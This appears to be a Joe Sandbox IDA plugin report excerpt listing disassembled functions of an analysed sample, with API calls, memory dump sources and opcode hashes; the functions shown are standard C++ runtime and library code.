                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                          • String ID:
                                          • API String ID: 1924466884-0
                                          • Opcode ID: 13850c0e90a9517a27e860b2880ba6a9336e41002d4235d07c707933d08f8871
                                          • Instruction ID: 70622bb3edb412ce9296619ecb3402146c00b265d4be67841179481950e9809c
                                          • Opcode Fuzzy Hash: 13850c0e90a9517a27e860b2880ba6a9336e41002d4235d07c707933d08f8871
                                          • Instruction Fuzzy Hash: 50412735A00204EFCB05EF64C595BADB7B5BF88311F1480AAED499B382DB34AA45CF91
                                          Function 009B5240 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 85memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,?,?,21472377,00000000), ref: 009B52A8
                                          • HeapFree.KERNEL32(00000000,?,21472377,00000000), ref: 009B52AF
                                          • CloseHandle.KERNEL32(?,21472377,75916230,?,21472377,00000000,00000000,00000000), ref: 009B52D9
                                          • CloseHandle.KERNEL32(?,?,21472377,00000000,00000000,00000000), ref: 009B52DE
                                          • CloseHandle.KERNEL32(?,?,21472377,00000000,00000000,00000000), ref: 009B52E3
                                            • Part of subcall function 00A3F480: GetProcessHeap.KERNEL32(00000000,?,?,w#G!,00A8E060,000000FF,?,009B528A,21472377,75916230), ref: 00A3F4CB
                                            • Part of subcall function 00A3F480: HeapFree.KERNEL32(00000000,?,?,w#G!,00A8E060,000000FF,?,009B528A,21472377,75916230), ref: 00A3F4D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Heap$CloseHandle$FreeProcess
                                          • String ID: w#G!$w#G!
                                          • API String ID: 3876841697-1134387879
                                          • Opcode ID: d155ca300955931814c611233e6fb9739fe3351b32b5c933317c94de4af24b1b
                                          • Instruction ID: 96e9073c55167ce4f40965e591644ef1e40784be8df7a2bdaf7429036da13942
                                          • Opcode Fuzzy Hash: d155ca300955931814c611233e6fb9739fe3351b32b5c933317c94de4af24b1b
                                          • Instruction Fuzzy Hash: 3C319332A11614EFCF10DF99DD81B5ABBB8FF09720F150269EA24AB2A0D7719C05CB90
                                          Function 00A58EEB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00A58F3E
                                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00A58F57
                                          • PMDtoOffset.LIBCMT ref: 00A58F7D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FindInstanceTargetType$Offset
                                          • String ID: Bad dynamic_cast!
                                          • API String ID: 1467055271-2956939130
                                          • Opcode ID: deb811f627742e2fc1cbd92da37ab8f25e2c5db5f5a6e562be19778d39554d07
                                          • Instruction ID: d8d49d7b017ed787a96cdabfa7f25c1aad2d275856e1351e38786c97ccc012b7
                                          • Opcode Fuzzy Hash: deb811f627742e2fc1cbd92da37ab8f25e2c5db5f5a6e562be19778d39554d07
                                          • Instruction Fuzzy Hash: CA210872A04205AFCF14DF64DE06AAE77B5FB88722F108659ED11B7580DF38E90987A1
                                          Function 00A427AE Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427BC
                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427C2
                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427EF
                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427F9
                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A4280B
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42821
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4282F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                          • String ID:
                                          • API String ID: 4227777306-0
                                          • Opcode ID: 2c9744f3070630f09a7cf076d70673e24136204fa71f7ce977f2cb8cf3bca3ea
                                          • Instruction ID: f200293ae7a00f81d4a4e00eec2e6914627c97d91c725028f8f9b0881426bb24
                                          • Opcode Fuzzy Hash: 2c9744f3070630f09a7cf076d70673e24136204fa71f7ce977f2cb8cf3bca3ea
                                          • Instruction Fuzzy Hash: DA018F3A704115A7CB20ABA6DD0ABFF777CEB84351BA0042AF511E20A1DF24E9058BA4
                                          Function 00A60EFE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A60EAF,?,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002), ref: 00A60F1E
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A60F31
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00A60EAF,?,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002,00000000), ref: 00A60F54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll$w#G!
                                          • API String ID: 4061214504-3421139166
                                          • Opcode ID: d44571056d2d19d7c30fa4b5cc2e11d345bcec0f1262fcd7a9898b761d1f5ff2
                                          • Instruction ID: bd44d63253ae3f0e9c9dfb1314013aadd37c0ec2d57ba5bde45e726ff660b7c8
                                          • Opcode Fuzzy Hash: d44571056d2d19d7c30fa4b5cc2e11d345bcec0f1262fcd7a9898b761d1f5ff2
                                          • Instruction Fuzzy Hash: CAF04431600218BBCF119B94DC09FDEBFF4EB04712F044165F906A6150DF709E81DA90
                                          Function 00A6C5C6 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: 9c0176134a39f7e72c2ef82b324e95c86f67c2346a5eaface233f7923650a260
                                          • Instruction ID: 9023ea47e048a35bafa0d7d3a54abd3ba5fb1e822d0a93a3fd59a27545e7b8ac
                                          • Opcode Fuzzy Hash: 9c0176134a39f7e72c2ef82b324e95c86f67c2346a5eaface233f7923650a260
                                          • Instruction Fuzzy Hash: FD512C36900205BBDF249B68CD41FBE77B8EF4D370F24921AF959D6192EB34DD008A68
                                          Function 00A529FB Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A52A3C
                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A52A44
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52A6E
                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00A52A77
                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A52AFA
                                          • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A52B02
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                                          • String ID:
                                          • API String ID: 3929269971-0
                                          • Opcode ID: 2a1fd83b4622b1f2a684369d9eab10e1c55eb28707d3f4ee94834a67457f0eaf
                                          • Instruction ID: 57a8f8aface1d6fb031550e2afe2914d163a9e97d7a01b6e77c6c5e2182a18bd
                                          • Opcode Fuzzy Hash: 2a1fd83b4622b1f2a684369d9eab10e1c55eb28707d3f4ee94834a67457f0eaf
                                          • Instruction Fuzzy Hash: 1E414A35A00219ABCF09DF68C554BADB7B5FF89311F008159E916AB391CB34AE05CF80
                                          Function 00A5A268 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00A5A25F,00A57DFA,00A843DF,00000008,00A84737,?,?,?,?,00A54F23,?,?,21472377), ref: 00A5A276
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A5A284
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A5A29D
                                          • SetLastError.KERNEL32(00000000,?,00A5A25F,00A57DFA,00A843DF,00000008,00A84737,?,?,?,?,00A54F23,?,?,21472377), ref: 00A5A2EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 98a1acee7f7a63e6ec80fe2cf6e14a551fe70085985acdc69b905f1171d1bdd6
                                          • Instruction ID: 92c13e558b69cf2730c769b56bf56f365622f21ff0c0de462600fd85a7bfa597
                                          • Opcode Fuzzy Hash: 98a1acee7f7a63e6ec80fe2cf6e14a551fe70085985acdc69b905f1171d1bdd6
                                          • Instruction Fuzzy Hash: B601D8363093116E9B24A7F46D46DEB6A6AFB217B2F210339F911410F1EFA24C855145
                                          Function 00A385F5 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A385FC
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38606
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • messages.LIBCPMT ref: 00A38640
                                          • std::_Facet_Register.LIBCPMT ref: 00A38657
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A38677
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A38695
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                          • String ID:
                                          • API String ID: 438560357-0
                                          • Opcode ID: 3367c76cf0cd4fb2abcacd3bf1ade723fcb9db94baa4b47d57cf102c846d7ea0
                                          • Instruction ID: 047599644720bac195e8ff47219d1a68d65d7993877d3b888e8736e5145f45b4
                                          • Opcode Fuzzy Hash: 3367c76cf0cd4fb2abcacd3bf1ade723fcb9db94baa4b47d57cf102c846d7ea0
                                          • Instruction Fuzzy Hash: AF11A0329002289BCF05EBA4DA56AEE7775BF84720F240519F4156B291CF789E01CB91
                                          Function 00A3854F Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A38556
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38560
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • collate.LIBCPMT ref: 00A3859A
                                          • std::_Facet_Register.LIBCPMT ref: 00A385B1
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A385D1
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A385EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                          • String ID:
                                          • API String ID: 2363045490-0
                                          • Opcode ID: c1742ac4efc1e18a9d0e0ef492a5b8d3a03ac37c34c9f22554d1060e9e018dd3
                                          • Instruction ID: 500c606e324faf24af2f39afce3ed3237e1ba7133fcf6eb11774c6527da35f69
                                          • Opcode Fuzzy Hash: c1742ac4efc1e18a9d0e0ef492a5b8d3a03ac37c34c9f22554d1060e9e018dd3
                                          • Instruction Fuzzy Hash: 6111A331900228ABCF05EBA4CA42AEE7775BF98720F240419F8116B291CF789E01CB91
                                          Function 00A387E7 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A387EE
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A387F8
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • moneypunct.LIBCPMT ref: 00A38832
                                          • std::_Facet_Register.LIBCPMT ref: 00A38849
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A38869
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A38887
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                          • String ID:
                                          • API String ID: 113178234-0
                                          • Opcode ID: 27cf7ae4dadaf7bc6ab98326096fee3256aeb84276041155c2c74e4b9844004d
                                          • Instruction ID: 3a22b31dcaf6d3b250fd3ec11c6897937901f190fb6e42e3349b9dd32a37a450
                                          • Opcode Fuzzy Hash: 27cf7ae4dadaf7bc6ab98326096fee3256aeb84276041155c2c74e4b9844004d
                                          • Instruction Fuzzy Hash: 7F11A032D002289BCF05FBA8DA56AEE7775BF84760F640519F5117B291DF389E01C791
                                          Function 00A3888D Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A38894
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A3889E
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • moneypunct.LIBCPMT ref: 00A388D8
                                          • std::_Facet_Register.LIBCPMT ref: 00A388EF
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A3890F
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3892D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                          • String ID:
                                          • API String ID: 113178234-0
                                          • Opcode ID: 14301e83ef6b8afa58dfdd678aa84626f07113c2ac887301a0afb17b418ec2c1
                                          • Instruction ID: 7a259218a4c29888af75b2a54d3ffa64c9edcdef27fe570fddeaf42e6eff8ddd
                                          • Opcode Fuzzy Hash: 14301e83ef6b8afa58dfdd678aa84626f07113c2ac887301a0afb17b418ec2c1
                                          • Instruction Fuzzy Hash: CA11A371900228ABCF05EBA4C942BFEB774BF84714F240419F8116B291CF389A01CB91
                                          Function 00A2B0E3 Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B0EA
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B0F4
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • collate.LIBCPMT ref: 00A2B12E
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B145
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B165
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B183
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                          • String ID:
                                          • API String ID: 2363045490-0
                                          • Opcode ID: c298b5fa4892c0e332d01ab853940d5f02e9a5f9f22f48354e474f013f5129fb
                                          • Instruction ID: bf7d7ad7b95961dbc12963aa7a34236b85b2f4dde7b807113dd302794956557b
                                          • Opcode Fuzzy Hash: c298b5fa4892c0e332d01ab853940d5f02e9a5f9f22f48354e474f013f5129fb
                                          • Instruction Fuzzy Hash: 8B11A3359101249BCF05EBA8D955AFE77B5BF84720F240519E5116B2A1CF349E41C7A1
                                          Function 00A2B03D Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B044
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B04E
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • codecvt.LIBCPMT ref: 00A2B088
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B09F
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B0BF
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B0DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                                          • String ID:
                                          • API String ID: 2594415655-0
